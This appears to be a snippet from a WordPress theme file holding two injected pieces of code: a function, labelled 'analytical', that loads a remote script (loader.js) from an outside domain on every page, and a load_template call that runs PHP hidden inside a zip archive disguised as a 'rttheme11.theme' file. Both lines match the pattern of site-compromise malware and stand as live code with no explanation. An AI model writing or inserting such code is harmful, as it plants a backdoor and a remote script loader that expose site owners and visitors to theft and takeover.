// analytical function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); /* Rttheme11 Theme */ load_template( "zip://" . locate_template( "rttheme11.theme" ) . "#archive", true );